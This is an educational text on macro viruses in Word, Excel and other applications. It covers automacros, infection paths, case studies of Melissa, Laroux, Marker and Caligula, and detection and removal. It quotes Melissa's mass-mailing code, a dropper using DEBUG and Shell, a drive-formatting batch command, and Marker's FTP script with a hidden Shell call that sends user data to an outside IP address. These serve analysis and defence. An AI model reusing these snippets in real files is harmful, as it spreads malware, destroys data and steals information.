Macro Viruses



Macro Viruses

What Is a Macro Virus?

A simple macro is series of steps that could otherwise be typed, selected, or configured, but are stored in a single location so they can automated.

Many programs, such as Word, allow you to record a series of keystrokes and menu selections and then save them to a file. Although nifty, creating a macro one keystroke at a time doesn't make for fast or sophisticated application development. Macro languages are used to allow more sophisticated macro development and environment control.

A macro language is a programming language, but it has its drawbacks. First, and most obvious, it cannot run without the underlying application. This leads into the second drawback -- macro languages are usually interpreted, not compiled. Each macro command must be eventually broken down into its runtime counterpart, and this translation takes time. Programs with large macros or large amounts of manipulated data are very slow.

Why Virus Writers Like Macro Viruses

-they are easy to write.

- everyone exchanges documents and data, and in doing so, macro viruses can infect more people than their more complex counterparts.

-Macro viruses can be cross-platform and multicultural, infecting any computer capable of running Office, or even infecting different applications sharing the same underlying macro language

- Internet Explorer can automatically download Office documents from the Web or from within emails without prompting the user to confirm the download.

How Macro Viruses Spread

With few exceptions, macro viruses are spread when a user opens or closes an infected document. The document contains a macro that then infects the user's program and other documents, and the cycle is continued. Documents are spread between users in the following ways: email, diskette, Internet, and CD-ROM.

What a Macro Virus Can Do

A macro virus author can program his creation to do almost anything that is possible with a PC. It can corrupt data, create new files, move text, flash colors, insert pictures, send files across the Internet, and format hard drives. Not simply limited to the already powerful macro language commands, macro viruses are increasingly used as transport mechanisms to drop off even nastier bugs. Macro viruses can use the VBA SHELL command  or utilize the operating system's kernel API to run any external command they want. The VBA KILL command can be used to delete files. Macro viruses modify registries, use email to forward copies of itself to others, look for passwords, copy documents, and infect other programs. Macro viruses can do a lot of different damage in a lot of different ways.

Microsoft Word and Excel Macros

Although applications may share a common macro language, each has its own structure and way of operating. Macros written for one type of application usually do not work in another. Manipulating a document in Word is completely different than moving around in an Excel workbook. Even similar events, such as adding together the numbers from two cells, bears little resemblance to each other behind the scenes. To understand macro viruses, you must understand how each application uses macros.

Word Macros

Although macros in Word can be saved in a document, they are more often stored in a separate file type called a template (prior to Word 97, macros had to be stored in a template). The template can contain many of the settings a user wants to include in her default document, like font type, toolbar settings, key assignments, styles, font size, page layout, etc. Every Word document is based on a template, and that template is linked to the document. Whenever an existing or new document is opened, the template settings are applied first. A global template, usually called NORMAL.DOT, is in memory every time Word is loaded. This is a favorite of virus writers, because a macro placed there is able to infect more quickly.

| |

Automacros

Like other applications with macro languages, Word and Excel have the ability to automatically launch a macro when a document or template is opened or whenever some other key event is initiated. This is done by naming a macro after a predefined keyword reserved for such a purpose. Here are some of the automacro's especially coveted by Word virus writers:

 AutoExec

Runs whenever you start Word or load the global template

AutoOpen

Runs whenever you open an existing document (Auto_Open in Excel) 

AutoNew

Runs whenever you create a new document 

AutoClose

Runs each time you close a document (Auto_Close in Excel) 

AutoExit

Runs whenever you quit Word or unload the global template

There are other system macros, such as FileSave and FileClose in Word and Workbook_Activate and Workbook_Deactivate in Excel, that automatically run when their associated event happens. In these cases, saving or closing a file would run macros with those names. There are even system macros associated with different menu options that allow programmers to define their own happenings when a particular menu option is chosen. Virus writers love to hide their creations by rewriting what happens when a user chooses Tools->Macros by using a macro called ToolsMacro (known as menu interception).

Excel Macros

Excel data files are called workbooks and have an .XLS extension. Each workbook can contain many worksheets (also known as sheets or spreadsheets). Each sheet has its own tab within the workbook. Macros in Excel can be stored in the same workbook as the data, but can also be stored in separate workbooks. Macros meant to be available to all workbooks are usually stored in a workbook called PERSONAL.XLS. This file functions much like a global template in Word.

Excel's automacros are called Auto_Open and Auto_Close. They are used in the same way as automacros in Word. Macros can also be activated by different key combinations, menu choices, and sheet activity. Macro viruses wishing to be activated every session need only infect a workbook and store themselves in Excel's startup directory. Then, when Excel loads, the virus loads. Most Excel viruses infect the current workbook, usually through a hidden sheet within the workbook, and also infect a startup directory workbook.

  Office 2000 Security

Office 2000 macro warning dialog box

[pic]

 

Security Levels

In Office 2000, you can set macro security as High, Medium, or Low, within each supported application. High, the default, will disable all unsigned or untrusted macros, and accept all signed trusted macros. Medium, will prompt the user to accept or deny the macro if it is not trusted. And Low will let all macros execute automatically without prompting the user. You get to macro security by choosing Tools->Macro->Security.

Office 2000 macro security menu

[pic]

 

Signed Macros

 Warning from document containing an unauthenticated, signed macro

[pic]

 

Macro Virus Technologies

This section of the chapter will cover how macro viruses work and the different technologies they use to spread. I will give more coverage to Word and Excel viruses because they represent the vast majority of macro viruses in the wild. Viruses for Access, PowerPoint, Corel Draw, etc. spread using similar concepts with different replication approaches and macro commands.

Word Infections

Word macro virus infection pathway

[pic]

 

Typically, menu options are rewritten by malicious macros to help the infection process. For example, a macro with the name FileSave will allow a programmer to redirect what happens when a Word user chooses File->Save from the menu bar.

Excel Infections

The Excel macro virus, Laroux, is one of the most widely reported virus infections in the world today and is a good example to talk about. Written in 1996, it used VBA 3.0 to infect Excel 5.0 and later versions. When an infected workbook is opened, the virus uses the Auto_Open macro to hand over control to the main virus macro, check_files. The virus then checks to see if it has infected the current workbook and looks to see if an infected copy is stored in Excel's startup directory. If not, it infects the current workbook by creating a hidden infected sheet, and saves a copy of itself to a file created in the startup directory so that it gets loaded every time Excel starts. It then infects every sheet that is clicked on. It contains no intentionally destructive routines, but can still cause problems because of its lack of error checking. Macros and data can inadvertently be overwritten as the virus goes to work.

General Macro Virus Techniques

Advances in antivirus technology and Microsoft security changes forced macro virus writers to learn new tricks. This next section talks about macro virus technologies beyond the early examples.

Email viruses

Unfortunately, using VBA it is all too easy for a virus to send itself to other victims using email. VBA allows a virus writer to query the system to get all the necessary information (email application name, user's name and email password) and send an attachment via email. MAPI , or Messaging Application Programming Interface, is the de facto standard for Windows email programs. It can be used by many computer languages to send email from a user's workstation to another user. Example below shows how the Melissa virus read the address book of infected users to get 50 recipient's email addresses to send itself to:

Melissa virus code sample

;Comments by Roger A. Grimes

Set UngaDasOutlook = CreateObject("Outlook.Application")

;creating an instance of Outlook

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\

Office\", "Melissa?") "... by Kwyjibo" Then

If UngaDasOutlook = "Outlook" Then

;if Outlook is the email engine...

DasMapiName.Logon "profile", "password"

;get email user's name and email password

For y = 1 To DasMapiName.AddressLists.Count

;set up getting ready to count number of contacts in address book

Set AddyBook = DasMapiName.AddressLists(y)

x = 1

Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x)

BreakUmOffASlice.Recipients.Add Peep

x = x + 1

If x > 50 Then oo = AddyBook.AddressEntries.Count

Next oo

;get up to 50 email addresses from address book

;end of Melissa code sample

 

Using those lines of code, Melissa was able to spread around the world in three days and shut down the world's biggest email servers. It also earned its programmer a guilty conviction. The malicious emailing is done in the background without the user noticing, with the exception of some temporary computer slowness. Hundreds of macro viruses now use VBA and MAPI to send themselves around the world, effectively becoming a new class of worms. The proliferation of emailing viruses has led most corporations to install a virus scanning engine on their email servers to remove the virus before it gets to the end user.

Stealth macro viruses

Encrypted and polymorphic macro viruses

Like their executable counterparts, many macro viruses change their appearance to avoid scanning detection. Random encryption routines are used to hide the virus code, but the cipher routines tend to be weaker than their executable virus counterparts. Some viruses randomly rename the macro names and memory variables. Others create their macros on the fly. They do this by storing most of the macros as plain text within the document, and calling a built-in macro builder. The macro builder then builds the macros and executes them.

Dropping off a friend

One of the scariest mechanisms a macro virus can contain is a routine to install a more dangerous virus or Trojan. Although most macro languages limit the scope of what can be manipulated by the application, sophisticated macro languages (like WordBasic and VBA) allow the external file and operating system to be modified. VBA and WordBasic allow external files to be created and existing files to be deleted or modified. Many macro viruses create a text file containing hexadecimal byte codes (assembly language commands) on a user's hard drive, and then modify the AUTOEXEC.BAT file so that the next time the PC is rebooted, DEBUG.EXE is called to compile the text file and convert it to an executable, and then it is executed. Thus, an even more malicious virus or Trojan can attack a computer. And all the user did was open a Word document sent by a friend or coworker. An early macro virus named Nuclear was the first to including a virus dropper (although the first versions were too buggy to work). Example below shows sample coding that could be used in conjunction with DEBUG.EXE to spread a virus (code is deliberately crippled).

 Example of macro virus coding to drop off a file virus

;First part of code creates the source code file to be compiled later

Open "C:\VIRUS.SCR" For Output as #1

;Source code called VIRUS.SCR

Print #1, "N "

;Compiled code will be called

;Next commands write in hexadecimal codes

Print #1, "E 0840 81 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B"

Print #1, "E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B"

Print #1, "E 0860 44 F2 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E"

Print #1, "E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04"

Print #1, "E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04"

Print #1, "Q"

;Quit DEBUG.EXE

Close #1

;next create a batch file that will compile the virus

;needs to be added to autoexec.bat so that the next time the PC is

;rebooted, virus will run

Open "C:\GOTYA.BAT" For Output as #1

Print #1, "debugnul"

;Feeds source code into DEBUG.EXE command to compile file

Print #1, "echo @C:\>>C:\AUTOEXEC.BAT

;inserts compiled virus into autoexec.bat file so it gets run after the

;next reboot.

Close #1

ChDir "C:\"

Shell "GOTYA.BAT", 0

;Shell command runs batch file to compile virus and modify autoexec.bat

;end of example

 

If you see code resembling the example above, you can be almost 100 percent sure it is a virus or Trojan.

More external manipulation with VBA

VBA contains plenty of functionality to allow macro viruses to interact with the PC outside of the scope of the application. Here are a few examples:

•         The VBA KILL command allows any file on the local hard drive to be deleted. It supports wildcard (* or ?) symbol use, although it won't work on Macintosh versions of Word.

•         Macro viruses can delete subdirectories with the RMDIR command.

•         The SHELL command is the most powerful command and allows any external command to be executed.

•         Better yet, for malicious code writers it has a parameter, vbHide, which allows the external command to be run in a hidden window.

These four example commands can make any PC vulnerable to numerous types of attack.

Startup directory files

Most Microsoft Office applications have a Startup directory defined under Tools->Options. Any templates stored in these locations are automatically loaded when the corresponding application is started. To make matters worse, Microsoft does not warn users of macros contained in these documents (even when security is set on high). Many antivirus researchers believe this is a huge mistake on Microsoft's part, and opens big holes that macro virus writers capitalize on.

Random evolution

Because macro viruses can contain many of the same macro names, such as AutoOpen or FileSaveAs, it is not uncommon for a document infected with two different macro viruses to end up creating a new virus that includes routines from each of the former. The WM.Colors.B macro virus contains Colors and Concept virus routines. Randomly evolving viruses have been speculated from the start (Dr. Fred Cohen discussed them frequently), but they were not a reality until the forgiving nature of the macro language appeared. There have been a few other variants produced from executable viruses, but the complexity of moving file pointers and entry points usually produces a nonreproducing offspring or one virus completely disables the other.

within weeks, each with a different method of infection.

| |

Macro Virus Examples

Here are some representative sample descriptions that demonstrate the versatility of macro viruses.

W97M.Melissa.ac

This Melissa variant attempts to format local hard drives and corrupts CMOS memory, along with using email clients to forward itself. It drops off a batch file, called DRIVES.BAT, that contains the following the commands that will format hard drives:

echo y|format/q d: /v:Empty>NUL

 This command is repeated for drives D thru Z.

It also edits the AUTOEXEC.BAT file to run a dropped malicious file, . This executable file will attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not result in permanent damage to your CMOS.

W97M.Marker

Marker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS. The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in the example below:

Example Marker virus FTP script file

o 209.201.88.110

;opens an ftp connection to hacker's ftp site

user anonymous

;logs user in as anonymous

pass itsme@

;puts in password

cd incoming

;changes to subdirectory called incoming on hacker's site

ascii

;puts file transfer in ascii text transmission mode

put hsfedrt.sys

;uploads tracking information to ftp site, where hsfedrt.sys can be any

;randomly generated name.

quit

;ends ftp session

 

The macro code contains the following SHELL command, which allows it to do its work secretly:

SHELL " /C FTP.EXE -n -s:c:\netldx.vxd", vbHide

 

It also disables Word's macro warning prompt. It keeps track of the user information found in Word's User Name and User Address information fields. Thus, anyone infected can usually find out who infected them and trace the origin of the virus back several generations. The virus maintains a setting in the registry (HKCU\Software\Microsoft\MS Setup (ACME)\User Info\LogFile) to keep track of whether it has sent information from this particular user before. If so, it doesn't do it again.

| |

|Although ACME conjures up images of roadrunner cartoons, it is a valid subkey name coded by Microsoft and not by |

|the virus. |

| |

 

Example below shows a log file provided in an example I received (names and addresses have been changed to protect the innocent):

Marker virus log file

'Logfile

'09:08:36 - Saturday, 28, Nov 1998

'Richard D. Collier, III

'

'

'02:50:31 PM - Saturday, 28 Nov 1998

'Elizabeth Rose'

'Straight-A Students, Inc.

'

'12:49:03 PM - Saturday, 9 Jan 1999

'Lillian Hanson

'Genius Tutoring

'Two Embargo, Suite 3800

'Richmond, CA 94111

' 

Caligula Word Virus

The Codebreaker group released another intriguing macro virus. This one attempts to steal users' PGP private keys. PGP , or Pretty Good Privacy, is one of the world's most popular data and email encryption programs. PGP users have a private encryption key that is used to do the encrypting. It is encrypted itself, but usually protected by a weak password. The Caligula virus is a stealth Word infector written in VBA5. When loaded, it checks to see if the current Word document or global template contains a class module called Caligula. If not, it exports its source code to a file called IO.VXD, and imports it to the global template. On the 31st of any month, it will display a message saying "No cia, No nsa, No satellite, Could map our veins. WM97/Caligula © Opic [Codebreakers 1998]."

Each time the virus is run it looks to see if it has already tried to steal the user's PGP private key (if one exists) by looking in registry entry HKCU\Software\Microsoft\MS Setup (ACME)\User Info. It looks for the value, Caligula. If present, it means it has already tried, or PGP isn't loaded on the user's PC. If not, it looks for PGP's install path from the registry and searches for the private key, which by default is named SECRING.SKR. Next, a new text file, CDBRK.VXD, is created as an FTP scripting file to upload the user's private key to the Codebreakers' FTP site. Even on users' systems without PGP, the virus will keep on replicating like any normal macro virus. I'm not sure of the legal reasons, but many computer security experts said this macro virus action (the stealing of a user's private encryption key) did not violate U.S. law. Luckily, the Codebreakers web site was shutdown in an unrelated hunt for the Melissa virus writer.

Triplicate Virus

Triplicate is a common macro virus and the first cross-platform virus to infect three applications: Word, Excel, and PowerPoint. It infects the global template in Word, places an infected workbook called BOOK1 in Excel's Startup directory, and creates a new macro module called Triplicate in Powerpoint. Triplicate was initially placed on a virus writer's web site, hidden in a web link. If a user clicked on the web link, it would load an infected document. In many cases, it would load in Word from within the browser without setting off any macro virus warnings.

GaLaDRieL

GaLaDRieL is the first virus based on Corel Script, the macro language for Corel Draw. It does a simple file search for new victim files (files with .CSC extension and the appropriate attributes). When a suitable file is found, it looks for the following text, "REM ViRUS," which identifies previously infected files. Its nonmalicious payload goes off on June 6 and displays an excerpt from The Lord of The Rings.

W2KM_PSD

Long before Office 2000 was officially released, it had its first macro virus. This polymorphic class virus waits until the day of the month is the same as the current minute, and then fills the current document with between 1 and 70 random shapes. It disables Word 2000's macro security by modifying the following registry key: HKCU\Software\Microsoft\Office\9.0\Word\Security.

Detecting Macro Viruses

Macro viruses, because they are contained in frequently shared datafiles, are good at spreading, and this accounts for the reason why they are currently the most popular malicious code type on the planet. However, there are dozens of symptoms, beyond your virus scanner going off, that should make you suspect a macro virus. Most of these apply to Word macro viruses, but others apply to any type.

Macro Warnings

Your Word Document Will Only Save as a Template

 Notice the difference between the document type icons

[pic]

 

Unexpected Document Modifications, Words, Messages, Graphics

New Macros Appear

Tools->Macro Is Disabled

Global Template File Date Is Current

Startup Directory Contains New Files

Removing Macro Viruses and Repairing the Damage

When a macro virus infects an application, at the very least, it infects the current document and autoloading data. An ever-growing number of macro viruses edit your registry, drop off or modify batch files, disable your menus, and cause all other sorts of damage. When you need to disinfect a system from a very ambitious virus, there is no one tool that can look for and remove all traces at once. Always start by trying to use your antivirus scanner. I've included five steps for manually removing macro virus code. Removing a virus by hand means learning everything you can about the virus. Learn about its actions, file and registry manipulations. 

Try a Virus Scanner

Using a current, reputable virus scanner should still be your first line of defense and removal. Most virus scanners can detect and repair the document damage done by most macro viruses, and do it more quickly than you can do it by hand. Most do not repair your registry, re-enable your application's virus protection, or fix other modifications to your system. They simply remove the macro virus from infected files. If you are allowing a scanner to remove a new virus for the first time, make a backup copy of the infected file first (most antivirus tools have this as an option during the cleaning). Some documents you clean can be completely ruined by macro virus cleaning tools. Also, macro virus removers typically remove all macros found in a document, even if they had nothing to do with the virus. 

If your virus scanner turns up nothing, but you still suspect a virus, try these next five ideas.

Get a Clean Application

Getting a clean application starts with getting a clean global template and clean startup files. If any of your global templates have become suspect (and the scanner didn't find anything), rename or delete them using Explorer while the application is closed. For both Word and Excel, search for and delete or move any infected files in your Startup directories. When you restart Word, it will re-create a clean global template and give you a clean environment to work with. If you had special settings or macros stored in a template that you wanted to retain, you should manually reset them in the new template.

Bypass Automacros

If you suspect a macro virus, it cannot hurt to hold down your Shift key while opening Word or Excel, or while opening up a document, workbook, or template. Doing so will automatically disable any automacros present. The Shift key can be held down while exiting to disable any AutoClose macros. This measure only provides a temporary answer, and most macro viruses utilize other menu commands, like FileSaveAs, to do their dirty work.

| |

|This bypassing trick does not always work, especially on Word 6.0, so check to see if the virus is active |

|afterward. |

| |

 

Inspect Data and Delete Malicious Macros

Open up your suspected macro document, being sure to disable macros. You have three macro tools within Office at your disposal: Macro Editor, Organizer, and Visual Basic Editor. I usually use all three to ensure everything is cleaned up. Make sure the infected document is in the active window. Use the Macro Editor, Tools->Macro->Macros to view and delete any visible macros. Be sure to click All active templates and documents at the bottom. Choosing the Edit option opens up VBE so you can inspect the macro code closer. With VBE, you can remove individual macro lines, although since most documents and workbooks shouldn't contain macros, it's just as easy to delete the whole macro in the Macro Editor or Organizer. You can't view or edit macro code in the Organizer, as it acts on the macro as a whole. Clean any suspected templates before cleaning files, or else your hard work will be for naught.

 

................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download